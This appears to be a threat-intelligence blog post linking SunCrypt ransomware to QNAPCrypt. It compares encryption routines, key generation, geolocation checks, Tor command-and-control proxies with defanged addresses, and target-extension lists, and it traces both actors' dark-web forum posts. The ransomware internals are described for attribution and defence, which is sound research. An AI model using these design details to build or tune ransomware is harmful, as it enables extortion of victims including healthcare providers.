&lt;a href="https://sapphirex00.medium.com/diving-into-the-sun-suncrypt-a-new-neighbour-in-the-ransomware-mafia-d89010c9df83"target="_blank" rel="noopener"&gt;well-documented&lt;/a&gt;
and some of the behaviors are similar between the two variants. For example,
both variants are designed to encrypt and steal data. This, together with the
name, is not enough to link the two variants together. Instead, we have to look
at other data points.&lt;/p&gt;
&lt;p&gt;After the ransomware has stolen and encrypted the files on the infected
machine, the user is presented with a ransom note. The ransom note for the 2020
variant is shown in Figure 1 below. The note can be read in English, German,
French, Spanish or Japanese. It has an input box that when the user enters the
unique ID, sends the user to a chat interface.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt/images/fig1.png" title="Figure 1: Ransom note pages for SunCrypt. Left is showing the original ransom note and right is showing the current ransom note used. Both share the same typos and structure. The current ransom note provides a link to the leak site while the original note does not." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 1: Ransom note pages for SunCrypt. Left is showing the original ransom note and right is showing the current ransom note used. Both share the same typos and structure. The current ransom note provides a link to the leak site while the original note does not.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The ransom note for the 2019 variant is very similar. It has essentially the
same text. The background color is different. The major difference is that the
2019 version does not include the text of leaking the stolen data if the ransom
is not paid, as can be seen in Figure 1.&lt;/p&gt;
&lt;h3&gt;Connection to QNAPCrypt&lt;span class="hx:absolute hx:-mt-20" id="connection-to-qnapcrypt"&gt;&lt;/span&gt;
&lt;a href="#connection-to-qnapcrypt" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The 2021 variant is potentially a beta release of the RaaS. The version
included in the PDB path is &amp;ldquo;0.1&amp;rdquo; as can be seen in Figure 2. The figure is
showing a partial output of &lt;a href="https://github.com/goretk/redress"target="_blank" rel="noopener"&gt;redress&lt;/a&gt;, a
tool used to analyze Go binaries. As part of the output, we can see a file
called &amp;ldquo;aes.go&amp;rdquo; with two functions. Note that one of the functions has a typo
in the name, &amp;ldquo;EncEAS&amp;rdquo; instead of &amp;ldquo;EncAES.&amp;rdquo; A similar file has been found being
part of another malware family, QNAPCrypt. This typo was included in two
samples of version 2 of QNAPCrypt
(&lt;a href="https://analyze.intezer.com/files/50470f94e7d65b50bf00d7416a9634d9e4141c5109a78f5769e4204906ab5f0b"target="_blank" rel="noopener"&gt;8dd59345cc034317630b2ac2ee19b362&lt;/a&gt;
and
&lt;a href="https://analyze.intezer.com/files/9d4bc803c256bd340664ce08c2bf68249f33419d7decd866f3ade78626c95422"target="_blank" rel="noopener"&gt;516291d10b370c7be3863335cf5d57eb&lt;/a&gt;).
An output generated by redress from one of the QNAPCrypt samples is shown in
Figure 3. After searching both our data set of malware and a retro hunt on
VirusTotal, only these three samples have the two function names. From this, we
can conclude that the typo is unique and potentially shared code between the
two ransomware families.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt/images/fig2.png" title="Figure 2: Partial output of redress for SunCrypt 2019 variant. One of the functions has the typo EAS instead of AES." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 2: Partial output of redress for SunCrypt 2019 variant. One of the functions has the typo EAS instead of AES.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt/images/fig3.png" title="Figure 3: Output from redress for a version of QNAPCrypt with the same typo." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 3: Output from redress for a version of QNAPCrypt with the same typo.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;A deeper analysis of the function confirms that they are derived from the same
source. A flow graph of &amp;ldquo;&lt;code&gt;EncFile&lt;/code&gt;&amp;rdquo; is shown in Figure 4 and a flow graph for
&amp;ldquo;&lt;code&gt;EncEAS&lt;/code&gt;&amp;rdquo; is shown in Figure 5.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt/images/fig4.png" title="Figure 4: Flow graphs for EncFile function. The flow is identical." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 4: Flow graphs for EncFile function. The flow is identical.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The samples are compiled for different operating systems and architectures
using different versions of the Go compiler which results in a slight
difference in the generated assembly code. The function opens a file handler to
the file to be encrypted. It uses the &amp;ldquo;Stat&amp;rdquo; function provided by Go&amp;rsquo;s standard
library to determine the file size. Based on the size, the flow splits into two
different branches.&lt;/p&gt;
&lt;p&gt;For SunCrypt, if the file is larger than 100 MB it goes down one branch while
QNAPCrypt uses a cutoff of 10 MB. Files smaller than the cutoff size goes down
to the second branch. In the large file branch, the SunCrypt reads in the first
100 MB using the &amp;ldquo;ReadAtLeast&amp;rdquo; function that is part of the standard library
&amp;ldquo;io&amp;rdquo; package. QNAPCrypt does the same but in the first 10 MB instead.&lt;/p&gt;
&lt;p&gt;For the smaller files, both families use the &amp;ldquo;ReadFile&amp;rdquo; function from the &amp;ldquo;io&amp;rdquo;
package. The read-in data is passed to the &amp;ldquo;&lt;code&gt;EncEAS&lt;/code&gt;&amp;rdquo; function that encrypts
the data. The content is finally written to disk as a new file with an
extension appended while the original file is removed. Except for the size
cutoff, the function logic in the two families is identical.&lt;/p&gt;
&lt;p&gt;The &amp;ldquo;&lt;code&gt;EncEAS&lt;/code&gt;&amp;rdquo; function encrypts the data using AES in Cipher Feedback (CFB)
mode. A comparison between the flow graphs is shown in Figure 5 below. As with
the &amp;ldquo;EncFile&amp;rdquo; function, the &amp;ldquo;&lt;code&gt;EncEAS&lt;/code&gt;&amp;rdquo; function has an identical logic and it
can be confirmed that it was compiled from a very similar source code.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt/images/fig5.png" title="Figure 5: Flow graph comparison between SunCrypt and QNAPCrypt&amp;#39;s EncEAS function." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 5: Flow graph comparison between SunCrypt and QNAPCrypt&amp;#39;s EncEAS function.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Other Similarities&lt;span class="hx:absolute hx:-mt-20" id="other-similarities"&gt;&lt;/span&gt;
&lt;a href="#other-similarities" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;In addition to the shared code between the two malware families for the
functionality responsible for the file encryption, the two families also have
other similarities. The similarities on their own do not indicate a connection,
but the collection of all of them does. The presentation of them is to
strengthen the connection indicated by the shared code. Figure 6 is showing
functions in QNAPCrypt that share similarities with functions in SunCrypt.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt/images/fig6.png" title="Figure 6: Functions with similarities between QNAPCrypt and SunCrypt. File encryption logic is identical while the key generation and the encryption of the key is very similar. Both malware use the locale of the machine and GeoIP to determine the location of the machine." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 6: Functions with similarities between QNAPCrypt and SunCrypt. File encryption logic is identical while the key generation and the encryption of the key is very similar. Both malware use the locale of the machine and GeoIP to determine the location of the machine.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Both ransomware are designed to not run on some of the Commonwealth of
Independent States (CIS). QNAPCrypt will not perform any encryption of files if
it believes it is running on a Belarusian, Russian or Ukrainian machine.
SunCrypt does the same, but also includes Kyrgyzstan and Syria in the list.&lt;/p&gt;
&lt;p&gt;The way the ransomware tries to determine this is very similar, both use two
sources for this information. One of the sources is the locale of the machine.
As QNAPCrypt is targeting Linux machines and SunCrypt targets Windows machines,
the way of obtaining this information is different. The second source is via
geolocation based on the external IP address of the machine. Both ransomware
reaches out to an external service to get this information, &amp;ldquo;&lt;code&gt;ip-api.com&lt;/code&gt;&amp;rdquo; for
SunCrypt and &amp;ldquo;&lt;code&gt;ipapi.co&lt;/code&gt;&amp;rdquo; for QNAPCrypt. While the families use different
services, they both use the locale on the machine and the geoip information to
determine if the machine is located in a disallowed country.&lt;/p&gt;
&lt;p&gt;As discussed in the section covering the file encryption code, the files are
encrypted with AES in CFB mode. Both ransomware generates a unique 32
characters &amp;ldquo;password.&amp;rdquo; The logic for generating this code is very similar. A
comparison of the logic is shown in Figure 7. The characters in the password
are randomly selected from a list of valid characters that includes all the
English upper and lower characters and the numbers 0 through 9. The list is
identical between the malware. The rand implementation provided the math
package in the standard library is used, which means the randomness is not
cryptographic. The randomness is seeded with the current time. The main
difference is that SunCrypt resets the seed every time the function responsible
for generating the &amp;ldquo;password&amp;rdquo; is called, while QNAPCrypt sets the seed during
the initialization. SunCrypt also uses the function to generate a victim
identifier.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt/images/fig7.png" title="Figure 7: Generation of the encryption password. The function loops 32 times and uses rand.Intn to pick a random character from the list of valid characters. When the loop is done, the byte slice of characters is converted to a string." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 7: Generation of the encryption password. The function loops 32 times and uses rand.Intn to pick a random character from the list of valid characters. When the loop is done, the byte slice of characters is converted to a string.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The encryption password is encrypted with a public RSA key included in the
binary. The logic for this code is similar as can be seen in Figure 8. The code
uses the &lt;code&gt;EncryptPKCS1v15&lt;/code&gt; function that is part of the &lt;code&gt;crypto/rsa&lt;/code&gt; package.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt/images/fig8.png" title="Figure 8: Encrypting of the password using the included public key in the binary." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 8: Encrypting of the password using the included public key in the binary.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Both ransomware families have command and control (C2) infrastructure hosted as
Tor hidden services. The first version of QNAPCrypt reached out to the C2 to
fetch information for the ransom note, including the Bitcoin wallet used for
the campaign. SunCrypt sends campaign information and uploads stolen files to
the C2 server. To access the hidden service, both families use a public
available SocksV5 proxy. QNAPCrypt connects directly to an IP address
(&lt;code&gt;192.99.206[.]61&lt;/code&gt;) while the proxy used by SunCrypt is accessed via the domain
&lt;code&gt;vie8hoos[.]xyz&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The file types encrypted by the ransomware are also similar. Both families have
a list of file extensions that they use to determine if the file should be
encrypted. In total, SunCrypt has a list of 589 file extensions. If we compare
the SunCrypt list to the list used by the first version of QNAPCrypt we can see
that SunCrypt&amp;rsquo;s list has added four new entries and removed 19 entries. The
lists are not sorted in any way so the extract lists appear exactly in the same
order as they appeared in the malware. The code snippet below shows the &lt;code&gt;diff&lt;/code&gt;
between the two lists.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;$ diff suncrypt_ext.lst qnap_ext_20190705.lst
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;460d459
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;lt; .mp4
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;562, 564d560
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;lt; .java
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;lt; .swift
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;lt; .go
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;589a586, &lt;span class="m"&gt;604&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .gcode
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .ngc
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .sldprt
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .sldasm
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .x_t
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .step
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .fits
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .cat
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .ctlg
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .fit
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .rsn
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .eml
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .vhdx
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .cfg
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .plist
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .bckup
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .far
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .tbz
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .abf&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;If we compare SunCrypt&amp;rsquo;s list to the list used by the second version of
QNAPCrypt from August the same year, the overlap is even bigger. The &amp;ldquo;diff&amp;rdquo;
output is shown in the snippet below. The difference is that SunCrypt has added
three entries and removed two. This results in a string similarity of 0.991
which is a strong similarity.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;$ diff suncrypt-files.lst qnap_ext_20190801.lst
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;562, 564d561
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;lt; .java
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;lt; .swift
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;lt; .go
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;589a587, &lt;span class="m"&gt;588&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .gcode
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&amp;gt; .ngc&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h2&gt;Dark Web Activity&lt;span class="hx:absolute hx:-mt-20" id="dark-web-activity"&gt;&lt;/span&gt;
&lt;a href="#dark-web-activity" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Not long after the public reports on QNAPCrypt/eCh0raix, a new forum user named
eCh0raix became active and started promoting the ransomware. Later, a SunCrypt
user account promoted a new ransomware affiliate service. While both actors
operated on the same popular Russian-language dark web forum, this is where the
similarities end.&lt;/p&gt;
&lt;h3&gt;eCh0raix&lt;span class="hx:absolute hx:-mt-20" id="ech0raix"&gt;&lt;/span&gt;
&lt;a href="#ech0raix" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The actor behind eCh0raix first posted on August 31, 2019, announcing an
affiliate program for a ransomware targeting Linux, Figure 9. This includes a
diagram showing how the program works.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt/images/fig9.png" title="Figure 9: Announcement post made by the eCh0raix actor on the dark web." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 9: Announcement post made by the eCh0raix actor on the dark web.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;In the post (Figure 10), eCh0raix cites research by threat researchers (from
Anomali and Trend Micro), a marketing technique often used by RaaS providers in
order to bolster credibility.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt/images/fig10.png" title="Figure 10: The threat actor referring to public research on his ransomware." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 10: The threat actor referring to public research on his ransomware.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;From this initial post until June 20, 2020, the actor posted 27 new threads on
the forum and another 77 replies to existing threads. They were quite
gregarious, jumping into threads and sharing expertise and advice. While the
actor did not give any updates on eCh0raix ransomware, all of the posts
concluded with a signature that included the citation from the threat
researchers.&lt;/p&gt;
&lt;p&gt;The actor&amp;rsquo;s catalogue of posts dealt with a broad variety of topics. On
December 25, 2019, eCh0raix offered a second service called DirBuster (Figure
11), for scanning domains, subdomains, pages, and scripts, which appears to
have been rebranded as Masscan a few months later:&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt/images/fig11.png" title="Figure 11: Forum post by the threat actor announcing port scanning service called Masscan." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 11: Forum post by the threat actor announcing port scanning service called Masscan.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The actor was also interested in virtualization, network access, and databases.
They posted a lengthy account of hacking a Magento site, sold SSH root
access/web shell access to a Costa Rican ad network and to an American IT
company, and a database dump from a Canadian cannabis store.&lt;/p&gt;
&lt;p&gt;In his final post (Figure 12) on the forum, the actor was looking to purchase a
Shodan account from which to export IP addresses. Like every post before it,
this post concluded with the same announcement of eCh0raix ransomware that had
been used ten months prior.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt/images/fig12.png" title="Figure 12: Final post by the threat actor." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 12: Final post by the threat actor.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Since this was posted on June 20, 2020, without any reason or indication the
account has been inactive.&lt;/p&gt;
&lt;h3&gt;SunCrypt&lt;span class="hx:absolute hx:-mt-20" id="suncrypt"&gt;&lt;/span&gt;
&lt;a href="#suncrypt" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;On August 12, 2020, the actor behind SunCrypt posted on the same forum for the
first time. In a post titled &lt;code&gt;[PARTNERSHIP PROGRAM] SunCrypt Ransomware&lt;/code&gt;
(Figure 13), the actor posted characteristics of the ransomware and issued a
call for five affiliates to spread the ransomware. The actor noted that once
the affiliate program was full, &amp;ldquo;we will go into private again.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt/images/fig13.png" title="Figure 13: Forum post announcing the SunCrypt partnership program." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 13: Forum post announcing the SunCrypt partnership program.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The actor posted 11 more times, all on this single thread and having to do with
searching for affiliates or answering technical questions about the ransomware.
On August 29, the actor announced that the affiliate program was full. Then on
September 3, they announced that a position was vacated.&lt;/p&gt;
&lt;p&gt;On September 19, an actor posted on the thread (Figure 14), &amp;ldquo;Even hospitals are
scammed by these scum,&amp;rdquo; and cited a Bleeping Computer article about a SunCrypt
attack against University Hospital New Jersey (UHNJ).&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt/images/fig14.png" title="Figure 14: Another threat actor posts in the SunCrypt thread about how the ransomware has been used in attacks against hospitals." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 14: Another threat actor posts in the SunCrypt thread about how the ransomware has been used in attacks against hospitals.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;SunCrypt wrote defensively (Figure 15), &amp;ldquo;how can I see you are the most honest
here…. Mother Teresa&amp;rdquo; a stretched take on &amp;ldquo;Let he who is without attacking a
hospital with ransomware cast the first stone.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;The actor continued, blaming the hospital attack on a new affiliate, who was
reportedly punished, since &amp;ldquo;we don&amp;rsquo;t do hospitals, government agencies,
airports, and so on.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt/images/fig15.png" title="Figure 15: The actor behind SunCrypt response to the hospital attack allegation." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 15: The actor behind SunCrypt response to the hospital attack allegation.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Later that day, another actor posted a lengthy technical analysis of the
ransomware. The SunCrypt actor angrily responded, &amp;ldquo;Tell me, why are you posting
this here?&amp;rdquo; and requested that the moderator erase the post (Figure 16).&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt/images/fig16.png" title="Figure 16: The threat actor&amp;#39;s angry response to a technical analysis of the ransomware." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 16: The threat actor&amp;#39;s angry response to a technical analysis of the ransomware.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;As of the date of this publication, the actor has not posted again. It is
unclear why.&lt;/p&gt;
&lt;p&gt;SunCrypt&amp;rsquo;s dedicated leak site (DLS) soon wound down. Starting on August 1,
there were 15 posts of data from targeted organizations. After September 19,
there were only three more over the next 10 days. Even though
&lt;a href="https://analyze.intezer.com/files/95ca9e284a085ce93f68c3d12e6c5f557a5049539e3379284a65de784e1bdeff"target="_blank" rel="noopener"&gt;new&lt;/a&gt;
samples of SunCrypt ransomware had surfaced in VirusTotal, it appears that
SunCrypt&amp;rsquo;s public campaign on dark web forums and management of a DLS went
dark.&lt;/p&gt;
&lt;p&gt;It is unclear why the forum thread went silent and why the DLS site suspended
operations, but the timing indicates that it was related to the hospital
attack. SunCrypt&amp;rsquo;s operators may have been afraid that unwanted notoriety would
attract law enforcement actions or security researchers, so they decided to
keep a lower profile until the attention subsided.&lt;/p&gt;
&lt;p&gt;Suddenly, on February 16, SunCrypt&amp;rsquo;s DLS listed a new victim: PRP Diagnostic
Imaging. It appears that SunCrypt has returned to the business of public
ransomware breaches.&lt;/p&gt;
&lt;p&gt;It is notable that PRP provides &amp;ldquo;an extensive range of diagnostic [medical]
imaging services,&amp;rdquo; such as MRIs, ultrasounds, and mammograms. Thus, while
attacking a hospital may have forced the actor to suspend operations for
several months, SunCrypt has returned and continues to target healthcare
providers. These, despite the actor&amp;rsquo;s protest that &amp;ldquo;we don&amp;rsquo;t do hospitals.&amp;rdquo;&lt;/p&gt;
&lt;h2&gt;Comparing the Actors&lt;span class="hx:absolute hx:-mt-20" id="comparing-the-actors"&gt;&lt;/span&gt;
&lt;a href="#comparing-the-actors" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Despite the code similarities between the two ransomwares, the actors behind
them exhibited very different behaviors. The eCh0raix actor mentioned his
ransomware in passing, but it was hardly their only focus. They launched other
initiatives, shared advice, and participated in unrelated conversations in the
forum.&lt;/p&gt;
&lt;p&gt;Meanwhile, the SunCrypt actor was solely focused on a single purpose:
advertising the ransomware in order to recruit affiliates. During his five
weeks of activity, they were active in one thread only. SunCrypt operated a DLS
site, indicating a more sophisticated operation, while eCh0raix did not.&lt;/p&gt;
&lt;p&gt;Considering these behavioral differences, it is our assessment that the
eCh0raix and SunCrypt accounts are operated by different individuals/groups.
Perhaps the eCh0raix actor, overwhelmed by their many initiatives, decided that
they did not have the resources to operate it and sold it to an affiliate.
Maybe they were approached by a stranger asking to procure the source code.
While we may never know the full story, it appears that the eCh0raix ransomware
was transferred to and upgraded by the SunCrypt operators.&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;span class="hx:absolute hx:-mt-20" id="conclusion"&gt;&lt;/span&gt;
&lt;a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;With technical analysis, it is possible to link the currently active version of
SunCrypt back to QNAPCrypt, a ransomware that was used to target NAS devices
back in the Summer of 2019. While the technical based evidence strongly
provides a link between QNAPCrypt and the earlier version of SunCrypt, it is
clear that both ransomware are operated by different individuals. Based on the
available data, it is not possible to connect the activity between the two
actors on the forum. This suggests that when new malware services derived from
older services appear, they may not always be operated by the same people.&lt;/p&gt;
&lt;p&gt;With this in mind, security officials should note that just because one malware
family is an iteration of another, it does not mean that the new family will be
deployed in exactly the same way. If a malware is exchanged, whether to an
affiliate or over the dark web, then the new operators may choose different
procedures, attack vectors, and targets. They might invest considerably in the
new malware, adding features and evasion techniques. Defenders must remain
vigilant.&lt;/p&gt;</description></item></channel></rss>